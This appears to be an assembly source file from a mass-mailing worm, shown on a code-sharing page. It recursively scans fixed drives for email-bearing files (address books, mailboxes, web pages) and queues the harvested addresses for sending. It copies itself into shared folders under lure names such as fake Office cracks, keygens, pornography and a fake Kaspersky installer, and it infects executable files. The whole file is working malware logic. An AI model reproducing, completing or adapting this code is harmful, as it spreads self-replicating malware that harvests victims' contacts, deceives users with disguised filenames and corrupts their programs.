📄 hddscanner.asm
字号:
; Recursive filesystem scanner
; ----------------------------
.data
szHDDSlash db "\",0
szHDDSearchMask db "*.*",0
szScanExtension db ".wab",0,".txt",0,".msg",0,".htm",0,".shtm",0,".stm",0,".xml",0,".dbx",0,".mbx",0,".mdx",0,".eml",0,".nch",0,".mmf",0,".ods",0,".cfg",0,".asp",0,".php",0,".pl",0
db ".wsh",0,".adb",0,".tbb",0,".sht",0,".xls",0,".oft",0,".uin",0,".cgi",0,".mht",0,".dhtm",0,".jsp",0,0
szShar db "shar",0
IFDEF TESTVERSION
szHDDBasePath db "C:\Emails\",0
ENDIF
szSharNames db "Microsoft Office 2003 Crack, Working!.exe",0
db "Microsoft Windows XP, WinXP Crack, working Keygen.exe",0
db "Microsoft Office XP working Crack, Keygen.exe",0
db "Porno, sex, oral, anal cool, awesome!!.exe",0
db "Porno Screensaver.scr",0
db "Serials.txt.exe",0
db "KAV 5.0",0
db "Kaspersky Antivirus 5.0",0
db "Porno pics arhive, xxx.exe",0
db "Windows Sourcecode update.doc.exe",0
db "Ahead Nero 7.exe",0
db "Windown Longhorn Beta Leak.exe",0
db "Opera 8 New!.exe",0
db "XXX hardcore images.exe",0
db "WinAmp 6 New!.exe",0
db "WinAmp 5 Pro Keygen Crack Update.exe",0
db "Adobe Photoshop 9 full.exe",0
db "Matrix 3 Revolution English Subtitles.exe",0
db "ACDSee 9.exe",0,0
.code
EmailAddToQueue proto :DWORD
HDDCopySelfToShares proc uses edi lpPath: DWORD
LOCAL adv_path: DWORD
invoke GlobalAlloc, GMEM_FIXED, 65000
mov adv_path, eax
mov edi, offset szSharNames
@next:
push edi
invoke lstrcpy, adv_path, lpPath
push adv_path
call lstrcat
invoke CopyFile, offset szSysDirFileName, adv_path, TRUE
mNextListEntry @next
invoke GlobalFree, adv_path
ret
HDDCopySelfToShares endp
HDDProcessFile proc uses edi szFullFilePath: DWORD
mov edi, offset szScanExtension
@next:
cld
mov edx, edi
xor eax, eax
or ecx, -1
repnz scasb
invoke StrStrI, szFullFilePath, edx
.IF eax
invoke EmailScanFile, szFullFilePath, offset EmailAddToQueue
.ELSE
cmp byte ptr[edi], 0
jnz @next
.ENDIF
IFNDEF DisableInfect
invoke StrStrI, szFullFilePath, offset szExeExe
.IF eax
invoke InfectPE, szFullFilePath
.ENDIF
ENDIF
ret
HDDProcessFile endp
HDDScanFromPath proc uses edi lpPath, szBasePath: DWORD
LOCAL hFind: DWORD
LOCAL FindFileData: DWORD
invoke LocalAlloc, GPTR, sizeof WIN32_FIND_DATA
mov FindFileData, eax
invoke lstrlen, lpPath
mov edi, eax
invoke lstrcat, lpPath, offset szHDDSearchMask
invoke FindFirstFile, lpPath, FindFileData
mov hFind, eax
inc eax
jz @end
@find_loop:
mov eax, lpPath
mov byte ptr[eax + edi], 0
mov edx, FindFileData
lea edx, [edx].WIN32_FIND_DATA.cFileName
cmp word ptr[edx], '.'
jz @skip
cmp word ptr[edx], '..'
jz @skip
invoke lstrcat, lpPath, edx
mov edx, FindFileData
lea edx, [edx].WIN32_FIND_DATA.dwFileAttributes
test dword ptr[edx], FILE_ATTRIBUTE_DIRECTORY
jz @file
; Check if Directory name has "share" substr in it
invoke StrRChr, lpPath, NULL, '\'
.IF eax
inc eax
invoke StrStrI, eax, offset szShar
.ENDIF
push eax
; Process Directory
invoke lstrcat, lpPath, offset szHDDSlash
pop eax
.IF eax
invoke HDDCopySelfToShares, lpPath
.ENDIF
invoke HDDScanFromPath, lpPath, szBasePath
jmp @skip
@file:
; Process File
invoke HDDProcessFile, lpPath
@skip:
invoke Sleep, 2
invoke FindNextFile, hFind, FindFileData
test eax, eax
jnz @find_loop
invoke FindClose, hFind
@end:
invoke LocalFree, FindFileData
ret
HDDScanFromPath endp
HDDScanDrive proc szDrive: DWORD
LOCAL szLongPath: DWORD
invoke GlobalAlloc, GPTR, 65536
mov szLongPath, eax
invoke lstrcpy, eax, szDrive
.IF eax
invoke HDDScanFromPath, szLongPath, szLongPath
.ENDIF
invoke GlobalFree, szLongPath
ret
HDDScanDrive endp
HDDScanDrives proc uses esi
LOCAL DrvBuf: DWORD
invoke GlobalAlloc, GPTR, 8192
mov DrvBuf, eax
invoke GetLogicalDriveStrings, 8191, eax
mov esi, DrvBuf
IFDEF TESTVERSION
invoke HDDScanDrive, offset szHDDBasePath
ELSE
@get_next_drv:
.IF byte ptr[esi]
invoke GetDriveType, esi
.IF eax == DRIVE_FIXED
invoke HDDScanDrive, esi
.ENDIF
invoke lstrlen, esi
add esi, eax
inc esi
jmp @get_next_drv
.ENDIF
ENDIF
invoke GlobalFree, DrvBuf
ret
HDDScanDrives endp
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -